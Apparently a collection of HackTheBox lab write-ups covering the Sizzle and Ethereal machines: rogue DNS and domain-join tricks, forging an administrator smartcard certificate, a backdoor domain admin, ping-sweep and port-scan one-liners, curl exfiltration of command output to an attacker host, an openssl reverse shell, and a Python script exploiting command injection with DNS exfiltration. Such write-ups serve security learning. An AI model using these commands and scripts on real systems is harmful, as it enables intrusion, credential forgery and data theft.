Note that the WinRM ports 5985 and 5986 remained forwarded ‘normally’ without proxychains socat all the time! So I am using one Windows box for WinRM, and I add another Windows box to the setup as the future ‘victim’ domain member.

I did not forward DNS as that would screw up the discovery of Kerberos and LDAP services: The Windows victim client will believe that my Kali box is the domain controller sizzle.htb.local, and it accessed it under my local 192.168.x.y address. When I would forward DNS queries to the true sizzle DC, it would respond with service records pointing to 10.10.10.103 … which the victim Windows box would not be able to locate. I tried some crazy things with ARP poisoning, but the solution is simpler: I set up dnsmasq as a fake DNS server on my Kali box and added all the required SRV records:

dnsmasq uses the dnsmasqhosts file instead of /etc/hosts plus settings in the dnsmasq.conf file that make the box the authoritative DNS server for htb.local

/etc/dnsmasqhosts

192.168.x.y sizzle.htb.local

/etc/dnsmasq.conf

addn-hosts=/etc/dnsmasqhosts
no-hosts

auth-zone=/htb.local
auth-server=/htb.local/192.168.x.y

srv-host=_ldap._tcp.HTB.LOCAL,sizzle.htb.local,389
srv-host=_ldap._tcp.Default-First-Site-Name._sites.HTB.LOCAL,sizzle.htb.local,389
srv-host=_ldap._tcp.dc._msdcs.htb.local,sizzle.htb.local,389
srv-host=_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.HTB.LOCAL,sizzle.htb.local,389
srv-host=_ldap._tcp.pdc._msdcs.HTB.LOCAL,sizzle.htb.local,389
srv-host=_ldap._tcp.gc._msdcs.HTB.LOCAL,sizzle.htb.local,3268
srv-host=_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.HTB.LOCAL,sizzle.htb.local,3268
srv-host=_gc._tcp.HTB.LOCAL,sizzle.htb.local,3268
srv-host=_gc._tcp.Default-First-Site-Name._sites.HTB.LOCAL,sizzle.htb.local,3268
srv-host=_kerberos._tcp.HTB.LOCAL,sizzle.htb.local,88
srv-host=_kerberos._udp.HTB.LOCAL,sizzle.htb.local,88
srv-host=_kerberos._tcp.Default-First-Site-Name._sites.HTB.LOCAL,sizzle.htb.local,88
srv-host=_kerberos._tcp.dc._msdcs.HTB.LOCAL,sizzle.htb.local,88
srv-host=_kpasswd._tcp.HTB.LOCAL,sizzle.htb.local,464
srv-host=_kpasswd._udp.HTB.LOCAL,sizzle.htb.local,464

Resources: List of the SRV records, how the locator process works. I am assuming that the standard name for the site was used – Default-First-Site-Name – which is confirmed by testing the record with nslookup as amanda, directly on sizzle. I omit the record containing the domain GUID though that can be found somewhere in AD (AD Sites and Services or adsiedit.msc).

I discovered some of the ports and records I had missed step by step, by sniffing the traffic on unsuccessful domain joins and net use attempts. For example, having received the info about the proper logon server, the client send an LDAP query over UDP 389 – easy to miss as an important port to be forwarded.

Joining a Windows client to the htb.local domain [>> Contents]

The victim client is a physical Windows 7 box. Redirecting the crypto token over RDP did work as well as connecting USB on a Windows VM – but I did not want to risk anything and rather use a physical USB connection.

On this Windows box I configure the internal IP address of Kali box as the only DNS server. dnsmasq returns all queries for the htb.local domain, and it also forwards other DNS queries to the internet.

I test with some of the SRV records (IP obfuscated):

nslookup
Default Server:  sizzle.htb.local
Address:  192.168.x.y

> sizzle.htb.local
Server:  sizzle.htb.local
Address:  192.168.x.y

Name:    sizzle.htb.local
Address:  192.168.x.y

> set query=SRV
> _kerberos._tcp.dc._msdcs.HTB.LOCAL
Server:  sizzle.htb.local
Address:  192.168.x.y

_kerberos._tcp.dc._msdcs.HTB.LOCAL      SRV service location:
          priority       = 0
          weight         = 0
          port           = 88
          svr hostname   = sizzle.htb.local
sizzle.htb.local        internet address = 192.168.x.y
> 

For completenes: I also add an LMHOSTS file for the domain HTB, and could thus see WINS-like names with nbtstat – but this is definitely not suffcient to locate the domain.

I join the machine to the domain using the GUI / Properties of My Computer, change computer name or domain. Enter the new domain:

Enter amanda’s credentials – she can add her box to the domain:

Welcome!

In parallel, I can check in the other Windows PC – in the PSSession – that my test machine has indeed been added to the domain!

[sizzle.htb.local]: PS C:\Users\amanda\Documents> get-adcomputer -filter *

DistinguishedName : CN=SIZZLE,OU=Domain Controllers,DC=HTB,DC=LOCAL
DNSHostName       : sizzle.HTB.LOCAL
Enabled           : True
Name              : SIZZLE
ObjectClass       : computer
ObjectGUID        : a4f7617b-9228-40b2-9e14-5b3aedb489bd
SamAccountName    : SIZZLE$
SID               : S-1-5-21-2379389067-1826974543-3574127760-1001
UserPrincipalName :

DistinguishedName : CN=TESTPC,CN=Computers,DC=HTB,DC=LOCAL
DNSHostName       :
Enabled           : True
Name              : TESTPC
ObjectClass       : computer
ObjectGUID        : 277cd1c8-0fd1-4816-a63e-bb0653c0ee59
SamAccountName    : TESTPC$
SID               : S-1-5-21-2379389067-1826974543-3574127760-3102
UserPrincipalName :

[sizzle.htb.local]: PS C:\Users\amanda\Documents>

Having recovered from the shock that this actually worked, I reboot the Windows 7 box and logon as amanda to the domain (and the PC) with her user name and password!

On the Kali box proxychains shows extensive communication over ports 88, 139, 445, 389,…, like this:

...
|S-chain|-<>-127.0.0.1:8088-<><>-10.10.10.103:445-<><>-OK
|S-chain|-<>-127.0.0.1:8088-<><>-10.10.10.103:88-<><>-OK
...

Summary of the solution so far [>> Contents]

As amanda, I confirm that could again run the MMCs that I already used before on the Windows attack DC – yes, I can again edit certificate templates and I can also see one more computer in AD Users and Computers :-)

  • Start hackthebox VPN on Kali.
  • Get a default User certificate for amanda once. It is persistent and will last until its or the CA’s expiry, not affected by box reset.
  • Forward WinRM ports to Windows box 1, start WinRM session.
  • Start a  simple shell, from there a meterpreter shell.
  • Start a socks proxy, and ioute traffic through the meterpreter session.
  • Forward all ports again from Kali to your test network using proxychains socat.
  • Setup dnsmasq on Kali tas fake htb.local server, host all SRV records.
  • On Windows box 2, configure your Kali’s internal IP as the only DNS server.
  • Join Windows box 2 to the domain htb.local as HTB\amanda
  • Logon to Windows box 2 as amanda
  • Edit the certificate template SSL to include required EKUs.
  • Prepare a CSR with the admin’s names.
  • Submit the file at /certsrv as amanda.
  • Import the certificate, export key and cert to a PFX, import it to a smartcard.

Finally: Using the Administrator’s token! [>> Contents]

Plug in the token and try net use! The smart card prompts for the PIN, and finally connects to c$ successfully!

C:\hackthebox>net use \\sizzle.htb.local\c$ /smartcard
Reading smart cards........
The following errors occurred reading the smart cards on the system:
No card on reader 2
No card on reader 3
No card on reader 4
No card on reader 5
Using the card in reader 1.  Enter the PIN:
The command completed successfully.

C:\hackthebox>dir \\sizzle.htb.local\c$
 Volume in drive \\sizzle.htb.local\c$ has no label.
 Volume Serial Number is 9C78-BB37

 Directory of \\sizzle.htb.local\c$

03.07.2018  17:22    <DIR>          Department Shares
02.07.2018  22:29    <DIR>          inetpub
02.12.2018  04:56    <DIR>          PerfLogs
26.09.2018  06:49    <DIR>          Program Files
26.09.2018  06:49    <DIR>          Program Files (x86)
11.07.2018  23:59    <DIR>          Users
06.05.2019  15:20    <DIR>          Windows
               0 File(s)              0 bytes
               7 Dir(s)  10.516.963.328 bytes free

C:\hackthebox>type \\sizzle.htb.local\C$\users\administrator\desktop\root.txt
91c58***************************
C:\hackthebox>

As amanda start a session as Administrator:

runas /smartcard cmd

Again the token asks for the PIN, and I finally have a shell!

\o/

Creating a (not really stealthy) backdoor admin [>> Contents]

I can now create another domain admin – I don’t even have to bother with powershell or net use as I could start any GUI tool from directly from that shell, e.g.

C:\Windows\system32\dsa.msc

Create a Test OU container and a Test User within in:

Add the user to some interesting groups:

Switch the user and logon as HTB\testuser. Now I have my own domain admin desktop!

 

Simple Ping Sweep, Port Scan, and Getting Output from Blind Remote Command Execution

Just dumping some quick and dirty one-liners! These are commands I had used to explore locked-down Windows and Linux machines, using bash or powershell when no other binaries were available or could be transferred to the boxes easily.

Trying to ping all hosts in a subnet

Linux

for i in $(seq 1 254); do host=192.168.0.$i; if timeout 0.1 ping -c 1 $host >/dev/null; then echo $host is alive; fi; done

Edit – a great improvement of this is the following, recommended by 0xdf:

for i in {1..254}; do (host=192.168.0.$i; if ping -c 1 $host > /dev/null; then echo $host alive; fi &); done

 

Windows – not the fastest as there is no timeout option for Test-Connection:

powershell -c "1..254 | % {$h='192.168.0.'+$($_); if ($(Test-Connection -Count 1 $h -ErrorAction SilentlyContinue)) { $('host '+$h+' is alive')|Write-Host}}"

Scanning open ports

Linux:

host=192.168.0.1; for port in {1..1000}; do timeout 0.1 bash -c "echo >/dev/tcp/$host/$port && echo port $port is open"; done 2>/dev/null

… or if nc is avaiable:

for port in $(seq 1 1000); do timeout 0.1 nc -zv 192.168.0.1 $port 2>&1 | grep succeeded; done

Windows – not using Test-NetConnection in order to control the timeout:

powershell -c "$s=$('192.168.0.1');1..1000 | % {$c=New-Object System.Net.Sockets.TcpClient;$c.BeginConnect($s,$_,$null,$null)|Out-Null;Start-Sleep -milli 100; if ($c.Connected) {$('port '+$_+' is open')|Write-Host }}"

Getting output back

… if all you can is running a command blindly, and if there is an open outbound port. In the examples below 192.168.6.6 is the attacker’s host – on which you would start a listener like:

nc -lvp 80

Linux

curl -d $(whoami) 192.168.6.6

Windows

powershell -c curl 192.168.6.6 -method POST -body $(whoami)

Echo Unreadable Hex Characters in Windows: forfiles

How to transfer small files to a locked-down Windows machine? When there is no option to copy, ftp, or http GET a file. When powershell is blocked so that you can only use Windows cmd commands?

My first choice would be to use certutil: certutil is a built-in tool for certificate and PKI management. It can encode binary certificate files – resulting in the familiar PEM output, starting with “—-BEGIN CERTIFICATE—–“. But it can actually encode any binary file! So you can ‘convert’ an executable to a certificate encoded in readable characters, and copy the fake PEM certificate by echo-ing out each of its lines on the target machine. Then the original exectutable  is recovered by decoding the file again with certutil.

But what if certutil is also blocked, and you need to write / paste unreadable characters?

On Linux, you could run

echo -e "\x41"

A

But Windows echo does not have an option to translate characters encoded in hex automatically.

The command line tool forfiles allows to do this, albeit in a bit convoluted way:

forfiles processes files in a directory, interprets the files’ metadata. The examples in the help information give an overview about what the tool is typically used for:

forfiles /?

FORFILES /P C:\WINDOWS /S /M DNS*.*
FORFILES /S /M *.txt /C "cmd /c type @file | more"
FORFILES /P C:\ /S /M *.bat
FORFILES /D -30 /M *.exe
/C "cmd /c echo @path 0x09 was changed 30 days ago"
FORFILES /D 01.01.2001
/C "cmd /c echo @fname is new since Jan 1st 2001"
FORFILES /D +8.5.2019 /C "cmd /c echo @fname is new today"
FORFILES /M *.exe /D +1
FORFILES /S /M *.doc /C "cmd /c echo @fsize"
FORFILES /M *.txt /C "cmd /c if @isdir==FALSE notepad.exe @file"

For each file in a filtered set a command can be executed with option /C. The interesting example is the one referring to

echo @path 0x09

The help explains:

To include special characters in the command
line, use the hexadecimal code for the character
in 0xHH format (ex. 0x09 for tab). Internal
CMD.exe commands should be preceded with
"cmd /c".

You want to run a single command, so you need to run forfiles once. Thus create an empty directory, cd to it, and create a single dummy file within it:

C:\test>echo test >test.txt

Then run echo [hex string] for that single file, like this. It outputs the interpreted characters corresponding to the hexadecimal values:

C:\test>forfiles /c "cmd /c echo 0x410x420x430x01"

ABC☺

C:\test>

Remaining issue: Newlines are added before and after the string. Especially the one at the beginning could be problematic if the operating system would try to find the magic bytes for a certain type of file there.

The first newline is removed by redirecting echo within the enclosed command (whereas redirecting the whole forfiles command would keep it)

C:\test>forfiles /c "cmd /c echo 0x410x420x430x01 >out.txt"

C:\test>type out.txt
ABC☺

C:\test>

The trailing extra line is a superfluous carriage return + linefeed. It can be removed by using the set command in this way:

set /p=[String]

This sets a variable without specifying a variable name, so the error level is set to 1. Nevertheless, it outputs the value of this non-existing variable – without an appended line break.

C:\test>forfiles /c "cmd /c set /p=0x410x420x430x01 >out.txt"


C:\test>type out.txt
ABC☺

This command seems to ‘hang’ and you need to ENTER once more to complete it. cmd is waiting for input here, and you can add input from the nul device – then the command is completed in one step:

C:\test>forfiles /c "cmd /c <nul set /p=0x410x420x430x01 >out.txt"

But there is still one a blank character (Hex 32) appended at the end:

C:\test>powershell Get-Content out.txt -encoding Byte
65
66
67
1
32

This blank goes away if no blank is entered between the hex string and the >:

C:\test>forfiles /c "cmd /c <nul set /p=0x410x420x430x01>out.txt"


C:\test>powershell Get-Content out.txt -encoding Byte
65
66
67
1

Remaining limitation: The contents of the variable must not begin with special characters that will trip up the set command. E.g. an equal sign at the beginning is a bad character (and it does not matter if this character is hex-encoded or not).

Ethereal @ hackthebox: Certificate-Related Rabbit Holes

This post is related to the ‘insanely’ difficult hackthebox machine Ethereal (created by egre55 and MinatoTW) that was recently retired. Beware – It is not at all a full comprehensive write-up! I zoom in on openssl, X.509 certificates, signing stuff, and related unnecessary rabbit holes that were particularly interesting to me – as somebody who recently described herself as a Dinosaur that supports some legacy (Windows) Public Key Infrastructures, like the Cobol Programmers tackling Y2K bugs.

Ethereal was insane, because it was so locked down. You got limited remote command execution by exfiltrating the output of commands over DNS, via a ‘ping’ web tool with a command injection vulnerability. In order to use that tool you had to find credentials in a password box database that was hidden in an image of a DOS floppy disk buried in other files on an FTP server. See excellent full write-ups by 0xdf and by Bernie Lim, or watch ippsec’s video.

Regarding the DNS data exfiltration I owe to this m0noc’s great video tutorial. You parse the output of the command in a for loop, and exfil data in chunks that make up a ‘host name’ sent to your evil DNS server. I am embedding my RCE script below.

openssl – telnet-style

To obtain a reverse shell and to transfer files, you had to use openssl ‘creatively’ –  as a telnet replacement, running a ‘double shell’ with different windows for stdin and stdout.

In order to trigger this shell as ‘the’ user- the one with the flag, named jorge, you needed to overwrite an existing Windows shortcut file pointing to the Visual Studio 2017 executable (.LNK). I created ‘malicious’ shortcuts using the python library pylnk, on a Windows system. The folder containing that file was also the only place at all you could write to the file system as the initial ‘web injection user’, alan. I noticed that the overwritten LNK was replaced quickly, at least every minute – so I also hoped that a simulated user will ‘click’ the file every minute.

Creating certificate and key …

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

Listening on the only ports open for outgoing traffic with two ‘SSL servers’:

openssl s_server -key key.pem -cert cert.pem -port 73
openssl s_server -key key.pem -cert cert.pem -port 136

The Reverse shell command to be used in the LNK file uses the ‘SSL client’:

C:\windows\System32\cmd.exe /c "C:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.19:136 | cmd 2>&1 | C:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -connect 10.10.14.19:73 2>&1 &"

The first rabbit hole I fell into was that I used openssl more ‘creatively’ than what was maybe needed. Though I found this metasploit module with a double telnet-style shell for Linux I decided to work on replacing the LNK first, and only go for a reverse shell if a simple payload in the LNK would work.

Downside of that approach: I needed another way of transferring the LNK file! If I had the reverse shell, already I’d been be able to use ‘half of it’ for transferring a file in the spirit of nc.

1) Run a ‘SSL server’ locally to be prepared for sending the file:

openssl s_server -quiet -key key.pem -cert cert.pem -port 73 <to_be_copied

2) Receive it using the SSL client:

openssl.exe s_client -quiet -connect 10.10.14.19:73 >to_be_copied

The usual ways to transfer files were blocked, for example certutil. certutil and certreq are the tools that are sort of an equivalent of openssl on Windows. certutil’s legit purpose is to manage the Windows PKI, manage certificate stores, analzye certificates, publish to certificate stores, download certificate revocation lists, etc. … The latter option makes it a ‘hacker tool’ because it lets you download other files like wget or curl (depending on the version of Windows and Defender’s vigilance doing heuristic checks of the action performed, rather than on the EXE itself).

Nearly missing out on openssl

When I saw openssl – installed on Windows! – I hoped I was on to something! However, I nearly let go of openssl as I failed to test it properly. I  ran openssl help in my nslookup shell, and did not get any response. Nearly any interesting EXE was blocked on Ethereal, so it came not as a surprise that openssl seemed to be, too.

Only after I was stuck for quite a while and a kind soul gave me a nudge to not abandon openssl too fast, I realized that the openssl help output is actually sent to standard error, not standard out.

You can redirect stderr to stdout using 2>&1 – but if you run the command ’embedded’ in the for loop (see python script below), you better escape both special characters like this:

'C:\progra~2\openssl-v1.1.0\bin\openssl.exe help 2^>^&1'

File transfer with openssl base64 and echo

My solution was to base64 encode the file locally with openssl (rather than using base64, just ‘to play it safe’), to echo out the file in  the DNS shell as alan on Ethereal, then base64 decode it and store it in the final location. I had issues with echoing out the full content in one line, so I did not use the –A option in openssl base64, but echoed one line after the other.

I missed that I can write to the folder – I believed I could only write to this single LNK file. So I had to echo to the exact same file that I would also use as the final target, like so:

type target.lnk | openssl base64 -d -out target.lnk

Below is my final RCE script for a simple ‘shell’ – either executing input commands 1:1 or special (series of) commands using shortcuts. E.g. for ‘echo-uploading’ a file, decoding, and checking the result I used

F shell.lnk
decode
showdir

In case I wanted to run a command without having to worry about escaping I can also run it blind, without any output via nslookup.

Script rce.py

import requests
import readline
import os
import sys

url = 'http://ethereal.htb:8080/'
headers = { 'Authorization' : 'Basic YWxhbjohQzQxNG0xN3k1N3IxazNzNGc0MW4h' }

server_dns = '10.10.14.19'
A_dns = 'D%a.D%b.D%c.D%d.D%e.D%f.D%g.D%h.D%i.D%j.D%k.D%l.D%m.D%n.D%o.D%p.D%k.D%r.D%s.D%t.D%u.D%v.D%w.D%x.D%y.D%z.'
template = '127.0.0.1 & ( FOR /F "tokens=1-26" %a in (\'_CMD_\') DO ( nslookup ' + A_dns + ' ' + server_dns + ') )'
template_blind = '127.0.0.1 & _CMD_'
template_lnk = '( FOR /F "tokens=1-26" %a in (\'_CMD_\') DO ( nslookup ' + A_dns + ' ' + server_dns + ') )'
# CSRF protections not automated as they did not change that often
# Copy from Burp, curl etc.
postdata = { 
    '__VIEWSTATE' : '/wEPDwULLTE0OTYxODU3NjhkZG8se05Gp91AdhB+bS+3cb/nwM7/1XnvqTtUaEoqfbcF',
    '__VIEWSTATEGENERATOR' : 'CA0B0334',
    '__EVENTVALIDATION' : '/wEdAAMwTZWDrxbqRTSpQRwxTZI24CgZUgk3s462EToPmqUw3OKvLNdlnDJuHW3p+9jPAN/MZTRxLbqQfS//vLHaNSfR4/D4qt+Wcl4tw/wpixmG9w==',
    'ctl02' : ''
}

target_lnk = 'C:\Users\Public\Desktop\Shortcuts\Visual Studio 2017.lnk'
target_lnk_dos = 'C:\Users\Public\Desktop\Shortcuts\Visual~1.lnk'
target_dir = 'C:\Users\Public\Desktop\Shortcuts\\'

openssl_path = 'C:\progra~2\openssl-v1.1.0\\bin\openssl.exe'

ask = True

def create_echo(infile_name, outfile_path):
    
    # File name must not include blanks
    b64_name = infile_name + '.b64'

    echos = []

    if not os.path.isfile(infile_name):
        print 'Cannot read file!'
        return echos
    else:
        os.system('openssl base64 -in ' + infile_name + ' -out ' + b64_name)
        f = open(b64_name, 'r')
    
    i = 0
    for line in f:
        towrite = line[:-1]
        if i == 0:
            echos += [ 'cmd /c "echo ' + towrite + ' >' + outfile_path + '"' ] 
        else:
            echos += [ 'cmd /c "echo ' + towrite + ' >>' + outfile_path + '"' ] 
        print line[:-1]
        i += 1

    f.close()
    return echos

def payload(cmd):
    return template.replace('_CMD_', cmd)

def payload_blind(cmd):
    return template_blind.replace('_CMD_', cmd)

def send(payload):
    print payload
    print ''
    
    if ask == True:
       go = raw_input('Enter n for discarding the command >>: ')
    else:
       go = 'y'

    if go != 'n':
        postdata['search'] = payload
        response = requests.post(url, data=postdata, headers=(headers))
        print 'Status Code: ' + str(response.status_code)
    else:
        print 'Not sent: ' + cmd

while True:

    cmd = raw_input('\033[41m[dnsexfil_cmd]>>: \033[0m ')

    if cmd == 'quit': 
        break

    elif cmd == 'dontask':
        ask = False
        print 'ask set to: ' + str(ask)
    elif cmd == 'ask':
        ask = True
        print 'ask set to: ' + str(ask)

    elif cmd[0:2] == 'F ':
        infile = cmd[2:]
        echos = create_echo(infile, target_lnk_dos)
        link = ' & '
        cmd_all_echos = link.join(echos)
        send(payload_blind(cmd_all_echos))

    elif cmd[0:2] == 'B ':
        cmd_blind = cmd[2:]
        send(payload_blind(cmd_blind))
       
    elif cmd == 'decode':
        cmd = 'type "' + target_lnk + '" | ' + openssl_path + ' base64 -d -out "' + target_lnk + '"'
        send(payload_blind(cmd))

    elif cmd == 'showdir':
        cmd = 'dir ' + target_dir
        send(payload(cmd))

    elif cmd == 'showfile':
        cmd = 'type "' + target_lnk + '"'
        send(payload(cmd))

    else:
        send(payload(cmd))

Finding that elusive CA certificate

After I finally managed to run a shell as jorge I fell into lots of other rabbit holes – e.g. analyzing, modifying, and compiling a recent Visual Studio exploit.

Then I ran tasklist for the umpteenth time, and saw an msiexec process! And lo and behold, even my user jorge was able to run msiexec! This fact was actually not important, as I found out later that I should wait for another (admin) user to run something.

I researched ways to use an MSI for applocker bypass. As described in detail in other write-ups you could use a simple skeleton XML file to create your MSI with the WIX toolset. WIX was the perfect tool to play with at Christmas when I did this box – it’s made up of executables called light.exe, candle.exe, lit.exe, heat.exe, shine.exe, torch.exe, pyro.exe, dark.exe, melt.exe … :-)

So I also created a simple MSI, ran it as jorge and nothing happened. Honestly, I cannot tell with hindsight if that should have possibly worked – just without any escalation to an admin or SYSTEM context – or I made an error again. But because of my focus on all things certificates and signatures, I suspected the MSI had to be signed – that would also be in line with the spirit of downlocking at this box.

Signed code does only run of the certificate is trusted. So I needed to sign the MSI either with a ‘universally’ / publicly trusted certificate (descending from a CA certified in the Microsoft Root Program) or there was possibly a key and certificate on the box I have not found yet. Both turned out to be another good chance for falling into rabbit roles!

Testing locally with certificates in the Windows store

I used one of my Windows test CAs and issued a Code Signing certificate, then used signtool to sign a test MSI. The reference to the correct store is in this case the CN of the Subject Name which should be unique in your store:

signtool sign /n Administrator /v pingtest.msi

The MSI could be ‘installed’ and my ping worked on a test Windows box. So I knew that the signing procedure worked, but I needed a certificate chain that Ethereal will trust. With hindsight, giving my false assumption that jorge will run the MSI, I should also have considered that jorge will install a Root CA certificate of my liking into his (user’s) Root certificate store. It should theoretically be doable fiddling with the registry only (see second hilarious rabbit hole below), but normally I would certutil for that. And certutil was definitely blocked.

Publicly trusted certificate

I do have one! Our Austrian health insurance smartcards have pre-deployed keys, and you can enroll for X.509 certificates for those keys. So on a typical Windows box, code signed with this ID card would run. But there is a catch: Windows does not – anymore, since Vista if I recall correctly – pre-populate the store with all the Root CAs certified by Microsoft. If you try to run a signed MSI (or visit an HTTPS website, or read a signed e-mail), then Windows will download the required root certificate as needed. But hackthebox machines are not able to access the internet.

Yet, in despair I tried, for the unlikely case all the roots were there. Using signtool like so, it will let me pick the smartcard certificate, and I was prompted for the PIN:

signtool sign /a /v pingtest.msi

So if my signed signed had screwed up the box, I could not have denied it – a use-case of the Non-Repudation Key Usage ;-)

Uploaded my smartcard-signed MSI. And failed to run it.

Ages-old Demo CA – and how to use openssl for signing

There was actually a CA on the box, sort of – the demoCA that comes with the openssl installation. A default CA key and certificate comes with openssl, and the perl script CA.pl can be used to created ‘database-like files and folders’. In despair I used this default CA certificate and key – maybe it was was trusted as kind of subtle joke? I did not bother to look closely at the CA certificate – otherwise I should have noticed it had expired long ago :-)

The process I tested for signing was the same I used later. As makecert is the tool that many others have used to solve this, I quickly sum up the openssl process.

You can either use the openssl ca ‘module’ – or openssl x509. The latter is a bit simpler as you do not need to prepare the CA’s ‘database’ directories.

Of course I used Windows GUI tools to create the request :-)

  • Start, Run, certmgr.msc
  • Personal, All Tasks, Advanced Operations, Create Custom Request
  • Custom PKCS#10 Request.
  • Extensions:
    Key Usage = Digital Signature
    Extended Key Usage = Code Signing
  • Private Key, Key Options: 2048 Bit
  • BASE64 encoding

The result is a BASE64 encoded ‘PEM’ certificate signing request. You can sign with the demoCA’s key like this – I did this on my Windows box.

openssl x509 -req -in req.csr -CA cacert.pem -CAkey private\cakey.pem -CAcreateserial -out codesign.crt -days 500 -extfile codesign.cnf -extensions codesign

There are different ways to make sure that the Code Signing Extended Key Usage gets carried over from the request to the certificate, or that it is ‘added again’. In the openssl.cnf config file (default or referenced via -config) you can e.g. configure to copy_extensions.

In the example above, I used a separate file for extensions. (Values seem to be case-sensitive, also on Windows).

[ codesign ]

keyUsage=digitalSignature
extendedKeyUsage=codeSigning

To complete the process, the Root CA certificate is imported in the the Trusted Root Certification Authorities store in certmgr.msc,  and the Code Signing certificate is imported into Personal certificates in certmgr.msc. In case the little key icon does not show up, key and certificate have not been properly united, which can be fixed with

certutil -repairstore -user my [Serial Number of the cert]

The file is signed without issues, however the resulting chain violates basic requirements for certificate path validation: The CA’s end of life was in 1998.

certutil cacert.pem

X509 Certificate:
Version: 1
Serial Number: 04
Signature Algorithm:
Algorithm ObjectId: 1.2.840.113549.1.1.4 md5RSA
Algorithm Parameters:
05 00
Issuer:
CN=SSLeay/rsa test CA
S=QLD
C=AU
Name Hash(sha1): 4f28bdc33fb78c854e2ceb26210f981bb73ce9ea
Name Hash(md5): ee7084bbed50615d1e118ff2ada590cf

NotBefore: 10.10.1995 00:32
NotAfter: 06.07.1998 00:32

Subject:
CN=SSLeay demo server
OU=CS
O=Mincom Pty. Ltd.
S=QLD
C=AU

Weird way to find a CA certificate

This was – for me – the most hilarious part of owning this box. The mysterious Root CA had to be in the Windows registry, and I had no certutil. So I resorted to looking at the registry directly.

‘Windows Certificate stores’ are collections of different registry key, this was the one relevant here.

C:\>reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\245C97DF7514E7CF2DF8BE72AE957B9E04741E85
....

But I wanted to look into the binary certificates with those keys so I dumped each of the keys (like 18F7C1FCC3090203FD5BAA2F861A754976C8DD25) and copied the contents from the terminal to a python script. This snippet shows only a single cert in the list:

certs = [
...
'190000000100000010000000E53D34CECB05C17EE332C749D78C02560F000000010000001000000065FC47520F66383962EC0B7B88A0821D03000000010000001400000018F7C1FCC3090203FD5BAA2F861A754976C8DD2509000000010000000C000000300A06082B060105050703080B000000010000003400000056006500720069005300690067006E002000540069006D00650020005300740061006D00700069006E00670020004300410000001400000001000000140000003EDF290CC1F5CC732CEB3D24E17E52DABD27E2F02000000001000000C0020000308202BC3082022502104A19D2388C82591CA55D735F155DDCA3300D06092A864886F70D010104050030819E311F301D060355040A1316566572695369676E205472757374204E6574776F726B31173015060355040B130E566572695369676E2C20496E632E312C302A060355040B1323566572695369676E2054696D65205374616D70696E67205365727669636520526F6F7431343032060355040B132B4E4F204C494142494C4954592041434345505445442C20286329393720566572695369676E2C20496E632E301E170D3937303531323030303030305A170D3034303130373233353935395A30819E311F301D060355040A1316566572695369676E205472757374204E6574776F726B31173015060355040B130E566572695369676E2C20496E632E312C302A060355040B1323566572695369676E2054696D65205374616D70696E67205365727669636520526F6F7431343032060355040B132B4E4F204C494142494C4954592041434345505445442C20286329393720566572695369676E2C20496E632E30819F300D06092A864886F70D010101050003818D0030818902818100D32E20F0687C2C2D2E811CB106B2A70BB7110D57DA53D875E3C9332AB2D4F6095B34F3E990FE090CD0DB1B5AB9CDE7F688B19DC08725EB7D5810736A78CB7115FDC658F629AB585E9604FD2D621158811CCA7194D522582FD5CC14058436BA94AAB44D4AE9EE3B22AD56997E219C6C86C04A47976AB4A636D5FC092DD3B4399B0203010001300D06092A864886F70D01010405000381810061550E3E7BC792127E11108E22CCD4B3132B5BE844E40B789EA47EF3A707721EE259EFCC84E389944CDB4E61EFB3A4FB463D50340B9F7056F68E2A7F17CEE563BF796907732EB095288AF5EDAAA9D25DCD0ACA10098FCEB3AF2896C479298492DCFFBA674248A69010E4BF61F89C53E593D1733FF8FD9D4F84AC55D1FD116363',
....
]
for cert in certs:
    print '======================================='
    print cert
    print '======================================='
    print cert.decode('hex')
    print '======================================='

OK, certainly not the most elegant way to deal with it, but I was loosing patience – I was on a war path!!

Strings in the output contain the CA’s Issuer and Subject Name, and most were familiar Microsoft, Versign, etc. With this exception:

=======================================
¬·╟<          òë┌┐ò$º¿Y╔&┌╢e½s╦π≥│τÇ╤#w▌╙o╠D       ╖è╔└eîqD╕ß!└öPδ⌠ ¡      ü¿M»╬Φv√tÄ.LgawĽ0ß       τ9╡ïε╢æï
  é0é010 U  My CA0é"0≥▀~àE~Γ<éíFj0
é ¥═p|ÉÉ▒ôfD╬,°á3╣Zƒ╕Cáφs╖Kεmìδ╗wFo2ßÄK ┘Xì╧Y?ÉR╢&,V┘Ω╠û5¬Σ▒┴Γ╧B·Gb4éτåi0Ku rí╕Oh≈φ¬u≤h¥J ┌┌º(┐Jk<√=-9{£H[▀ªP&«¢ΣU■2~ ½Öº-4║o/σ£oºå─∙Åédü¿éÅêr▐O.╘<'Qu∙w0~▒A±·â·{k
  é hòÿâ⌠╝*εC╡Åπs⌠╝[░╣±kπ{≥¬æ±¬╠b┐╤GëJ»i%┴       ╕ìiΦπ %¬*π[ò╗,9ü:╦-5  úV0T0 U  0  0A U :08ǽÖ┬ï]═8¬I¡X^⌠í010 U  My CAé÷h≥▀~àE~Γ<éíFj0

▀ó*┌û╞Qfè£ⁿ─;Lτ·II╫─╓┴¼╤N∩j Φ
)x═Mπ╪₧⌠ç╛ê┤YF:╛╢╙êDτσªM]Gá⌐ S≡∞Yg J»╪u

...

Maybe hard to spot, but there was a CA called My CA! But where was the key I needed to sign my own Code Signing cert?

In such cases, I typically resort to more Windows registry forensics. I hoped that ‘jorge’ or the box’ creators had touched a folder with these certificate and key. I walked through various Explorer-related keys, especially the infamous Shellbags:

HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2
    NodeSlot    REG_DWORD    0x3
    MRUListEx    REG_BINARY    0100000000000000FFFFFFFF
    0    REG_BINARY    4A00310000000000DB4CD6B3100044455600380009000400EFBEDB4C8FB3DB4CD6B32E0000002400000000000100000000000000000000000000000099306500440045005600000012000000
    1    REG_BINARY    5000310000000000E74C4AAE10004365727473003C0009000400EFBEE74C41AEE74C4AAE2E000000492E0000000003000000000000000000000000000000EAE7BD0043006500720074007300000014000000

